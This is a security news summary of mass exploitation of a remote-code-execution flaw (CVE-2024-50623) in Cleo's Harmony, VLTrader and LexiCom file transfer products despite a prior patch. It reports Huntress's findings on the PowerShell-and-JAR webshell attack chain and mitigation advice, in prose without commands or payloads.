Exploitation of Cleo Products Despite Previous Patch
2024-12-11
Learn about the importance of timely patch management and how vulnerabilities can still be exploited even after initial patches, highlighting the need for comprehensive security solutions.
A vulnerability in Cleo's Harmony, VLTrader, and LexiCom file management products is being actively exploited, even on systems thought to be patched, leading to unauthorized access and potential compromise of servers. Despite Cleo's previous patch efforts, the flaw allows attackers to execute remote code, impacting industries such as consumer products, food, and shipping. Huntress researchers observed these exploit attempts on numerous servers and provided detection rules and mitigation advice while Cleo works on a new patch. The attacks involve stealthy installation and deletion of autorun files and JAR files to maintain persistence, and Cleo users are advised to reconfigure their software to mitigate the impact.
Zero-Day, Patch Management, Remote Code Execution
Cleo, Harmony, VLTrader, LexiCom, Zero-Day, Remote Code Execution, Vulnerability, Patch Management
Cleo Harmony, Cleo VLTrader, Cleo LexiCom, consumer products industry, food industry, trucking industry, shipping industry, Active Directory
A vulnerability in Cleo's file management products—Harmony, VLTrader, and LexiCom—has led to mass exploitation, affecting thousands of servers. Despite Cleo's earlier patch for the CVE-2024-50623 vulnerability, attackers have found a way to exploit it, impacting industries like consumer products, food, trucking, and shipping. This issue has been termed "zero-day-ish" because, although Cleo addressed the vulnerability, attacks have persisted. Huntress, a security research firm, observed exploit attempts on over 1,700 Cleo servers, with a belief that the actual number of affected servers might be higher. The situation is alarming, especially given the similarities to previous incidents like the MOVEit MFT attacks. The attack involves the unauthorized execution of remote code through Cleo's systems. Attackers use stealth techniques, installing autorun files on compromised servers that are deleted post-processing. The exploit leverages Cleo's Import functionality to execute malicious PowerShell commands. These commands contact external servers to retrieve JAR files with webshell capabilities, which attackers also delete to cover their tracks. Huntress noted exploit attempts originating from various countries, including Moldova, the Netherlands, Canada, Lithuania, and the US. They have released sigma rules to detect potential exploitation and suspicious PowerShell activity, along with indicators of compromise (IOCs). Cleo is working on an updated patch, and Huntress advises users to reconfigure their software settings to limit the attack's impact. Specifically, Cleo users should delete the "Autorun Directory" field in their software configurations to mitigate code execution risks. However, this doesn't completely prevent the arbitrary file-write aspect of the exploit. While Cleo is developing further patches, it's crucial for users to take immediate steps to protect their systems, such as moving affected servers behind a firewall. This incident underscores the need for robust patch management and vigilance against evolving threats.Renewed Exploitation of Cleo File Management Products
The "Zero-Day-ish" Vulnerability
Attack Methodology
Geographic Spread and Detection
Response and Mitigation
Conclusion
https://www.theregister.com/2024/12/10/cleo_vulnerability/